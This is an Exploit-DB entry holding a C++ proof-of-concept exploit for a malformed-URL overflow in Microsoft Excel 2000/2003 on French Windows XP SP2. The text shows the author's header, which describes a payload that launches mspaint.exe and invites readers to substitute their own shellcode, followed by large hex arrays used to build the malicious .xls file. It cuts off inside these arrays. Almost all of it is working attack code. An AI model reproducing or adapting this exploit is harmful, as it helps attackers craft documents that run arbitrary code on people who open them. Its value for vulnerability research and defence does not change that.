- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1986
- Проверка EDB
-
- Пройдено
- Автор
- NSROCKET
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2006-07-06
C++:
/*
*************************************************************************
* *
* -/\_NSRocket_/\- *
* *
* presents *
* *
* Microsoft Excel 2000 and 2003 exploit for WinXP SP2 french *
* (with shellcode source integrated) *
* *
*************************************************************************
* *
* Description: *
* Microsoft Excel is prone to a remote code execution issue *
* which may be triggered when a malformed Excel document is opened. *
* The issue is due to an error in Excel while handling malformed URL *
* strings. there may be other ways to trigger this vulnerability, *
* successful exploitation could allow an attacker to execute *
* arbitrary code with the privileges of the user running Excel. *
* *
* Code execution is dependent upon certain factors including the *
* overflow condition, the MS Excel version and the host OS and SP. *
* If you cannot get it to work, attach it with the debugger check *
* the stack layout and the rest is on your imagination. :) :) *
* *
* Advisories: *
* http://www.microsoft.com/technet/security/advisory/921365.mspx *
* https://www.securityfocus.com/bid/18422/ *
* *
* Disclaimer: *
* This Proof of concept code is for educational purposes only. *
* Please do not use it against any system without authorization... *
* *
*************************************************************************
* *
* Thanks to Naveed Afzal who inspired me ;) with his exploit for Excel *
* 2000 on WinXP SP1 and Win2000 SP4. *
* *
* Shellcode launches "mspaint.exe" to validate exploit and terminates *
* Excel process. You can modify it as you want. Don't forget that it *
* must not contain any null byte when it will be assembled : use your *
* debugger to see opcodes generated from your shellcode source or check *
* the .xls file generated with an hex editor. *
* The generated file is modifiable as you wish with Excel without *
* affect the exploit result. The only thing that you must not change is *
* the link associated with the word "LINK". However, the word "LINK" *
* can be changed. *
* *
* "__asm" keyword in the "InsertShellcode" function works may be not *
* with your compiler. Replace it by the good one in this case (see your *
* compiler documentation :) *
* *
* any question goes to [email protected] ...bye ! *
* *
*************************************************************************
*/
#include <string.h>
#include <fstream.h>
#include <stdio.h>
#include <malloc.h>
//excel sheet formatting data bytes
unsigned char stream1[] = {
0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3E, 0x00, 0x03, 0x00, 0xFE, 0xFF, 0x09, 0x00,
0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x0E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0xFE, 0xFF, 0xFF, 0xFF,
0x00, 0x00, 0x00, 0x00, 0xFE, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x00, 0x00, 0x00,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0x09, 0x08, 0x10, 0x00, 0x00, 0x06, 0x05, 0x00, 0xBB, 0x0D, 0xCC, 0x07, 0x41, 0x00, 0x00, 0x00,
0x06, 0x00, 0x00, 0x00, 0x42, 0x00, 0x02, 0x00, 0xE4, 0x04, 0x8D, 0x00, 0x02, 0x00, 0x00, 0x00,
0x3D, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5C, 0x35, 0xED, 0x30, 0x38, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x00, 0x58, 0x02, 0x22, 0x00, 0x02, 0x00, 0x00, 0x00, 0x31, 0x00, 0x15, 0x00,
0xC8, 0x00, 0x00, 0x00, 0xFF, 0x7F, 0x90, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00,
0x41, 0x72, 0x69, 0x61, 0x6C, 0x31, 0x00, 0x15, 0x00, 0xC8, 0x00, 0x00, 0x00, 0xFF, 0x7F, 0x90,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x41, 0x72, 0x69, 0x61, 0x6C, 0x31, 0x00,
0x15, 0x00, 0xC8, 0x00, 0x00, 0x00, 0xFF, 0x7F, 0x90, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x05, 0x00, 0x41, 0x72, 0x69, 0x61, 0x6C, 0x31, 0x00, 0x15, 0x00, 0xC8, 0x00, 0x00, 0x00, 0xFF,
0x7F, 0x90, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x41, 0x72, 0x69, 0x61, 0x6C,
0x31, 0x00, 0x16, 0x00, 0xA0, 0x00, 0x00, 0x00, 0xFF, 0x7F, 0x90, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x06, 0x00, 0x54, 0x61, 0x68, 0x6F, 0x6D, 0x61, 0x31, 0x00, 0x15, 0x00, 0xC8, 0x00,
0x00, 0x00, 0x0C, 0x00, 0x90, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x41, 0x72,
0x69, 0x61, 0x6C, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00,
0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00,
0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00,
0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00,
0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00,
0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00,
0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00,
0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00,
0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00,
0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00,
0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00,
0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00,
0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00,
0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00,
0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x2B, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00,
0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00,
0x00, 0x29, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x2C, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00,
0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00,
0x00, 0x2A, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x09, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00,
0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x06,
0x00, 0x00, 0x00, 0x01, 0x00, 0x20, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0xC0, 0x20, 0x93, 0x02, 0x04, 0x00, 0x10, 0x80, 0x03, 0xFF, 0x93, 0x02, 0x04, 0x00, 0x11,
0x80, 0x06, 0xFF, 0x93, 0x02, 0x04, 0x00, 0x12, 0x80, 0x04, 0xFF, 0x93, 0x02, 0x04, 0x00, 0x13,
0x80, 0x07, 0xFF, 0x93, 0x02, 0x04, 0x00, 0x00, 0x80, 0x00, 0xFF, 0x93, 0x02, 0x04, 0x00, 0x14,
0x80, 0x05, 0xFF, 0x92, 0x00, 0xE2, 0x00, 0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF,
0x00, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xFF, 0x00, 0xFF, 0xFF, 0x00,
0x00, 0xFF, 0x00, 0xFF, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00,
0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x80, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x80, 0x80,
0x00, 0xC0, 0xC0, 0xC0, 0x00, 0x80, 0x80, 0x80, 0x00, 0x99, 0x99, 0xFF, 0x00, 0x99, 0x33, 0x66,
0x00, 0xFF, 0xFF, 0xCC, 0x00, 0xCC, 0xFF, 0xFF, 0x00, 0x66, 0x00, 0x66, 0x00, 0xFF, 0x80, 0x80,
0x00, 0x00, 0x66, 0xCC, 0x00, 0xCC, 0xCC, 0xFF, 0x00, 0x00, 0x00, 0x80, 0x00, 0xFF, 0x00, 0xFF,
0x00, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 0x00,
0x00, 0x00, 0x80, 0x80, 0x00, 0x00, 0x00, 0xFF, 0x00, 0x00, 0xCC, 0xFF, 0x00, 0xCC, 0xFF, 0xFF,
0x00, 0xCC, 0xFF, 0xCC, 0x00, 0xFF, 0xFF, 0x99, 0x00, 0x99, 0xCC, 0xFF, 0x00, 0xFF, 0x99, 0xCC,
0x00, 0xCC, 0x99, 0xFF, 0x00, 0xFF, 0xCC, 0x99, 0x00, 0x33, 0x66, 0xFF, 0x00, 0x33, 0xCC, 0xCC,
0x00, 0x99, 0xCC, 0x00, 0x00, 0xFF, 0xCC, 0x00, 0x00, 0xFF, 0x99, 0x00, 0x00, 0xFF, 0x66, 0x00,
0x00, 0x66, 0x66, 0x99, 0x00, 0x96, 0x96, 0x96, 0x00, 0x00, 0x33, 0x66, 0x00, 0x33, 0x99, 0x66,
0x00, 0x00, 0x33, 0x00, 0x00, 0x33, 0x33, 0x00, 0x00, 0x99, 0x33, 0x00, 0x00, 0x99, 0x33, 0x66,
0x00, 0x33, 0x33, 0x99, 0x00, 0x33, 0x33, 0x33, 0x00, 0x85, 0x00, 0x0E, 0x00, 0x22, 0x04, 0x00,
0x00, 0x00, 0x00, 0x06, 0x00, 0x53, 0x68, 0x65, 0x65, 0x74, 0x31, 0xFC, 0x00, 0x0F, 0x00, 0x01,
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x49, 0x4E, 0x4B, 0x0A, 0x00,
0x00, 0x00, 0x09, 0x08, 0x10, 0x00, 0x00, 0x06, 0x10, 0x00, 0xBB, 0x0D, 0xCC, 0x07, 0x41, 0x00,
0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x02, 0x00, 0x00, 0x00, 0x2B, 0x00, 0x02, 0x00,
0x01, 0x00, 0x82, 0x00, 0x02, 0x00, 0x00, 0x00, 0x80, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x25, 0x02, 0x04, 0x00, 0x00, 0x00, 0xFF, 0x00, 0x81, 0x00, 0x02, 0x00,
0xC1, 0x04, 0x14, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00,
0x83, 0x00, 0x02, 0x00, 0x00, 0x00, 0x84, 0x00, 0x02, 0x00, 0x00, 0x00, 0x26, 0x00, 0x08, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x3F, 0x27, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xE8, 0x3F, 0x28, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF0, 0x3F,
0x29, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF0, 0x3F, 0xA1, 0x00, 0x22, 0x00,
0x00, 0x00, 0x64, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x58, 0x02, 0x58, 0x02,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE0, 0x3F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE0, 0x3F,
0x01, 0x00, 0x55, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x02, 0x0E, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFD, 0x00, 0x0A, 0x00, 0x00, 0x00,
0x00, 0x00, 0x15, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB8, 0x01, 0x62, 0x15, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xD0, 0xC9, 0xEA, 0x79, 0xF9, 0xBA, 0xCE, 0x11, 0x8C, 0x82, 0x00, 0xAA,
0x00, 0x4B, 0xA9, 0x0B, 0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0xE0, 0xC9, 0xEA, 0x79,
0xF9, 0xBA, 0xCE, 0x11, 0x8C, 0x82, 0x00, 0xAA, 0x00, 0x4B, 0xA9, 0x0B
};
unsigned char stream2[] = {
0x00, 0x00, 0x00, 0x3E, 0x02, 0x12, 0x00, 0xB6, 0x06, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1D, 0x00, 0x0F, 0x00, 0x03, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x6F, 0x00, 0x6F, 0x00, 0x74, 0x00, 0x20, 0x00, 0x45,
0x00, 0x6E, 0x00, 0x74, 0x00, 0x72, 0x00, 0x79, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x16, 0x00, 0x05, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFE, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x6B, 0x00, 0x62, 0x00, 0x6F,
0x00, 0x6F, 0x00, 0x6B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x02, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8B, 0x1A, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
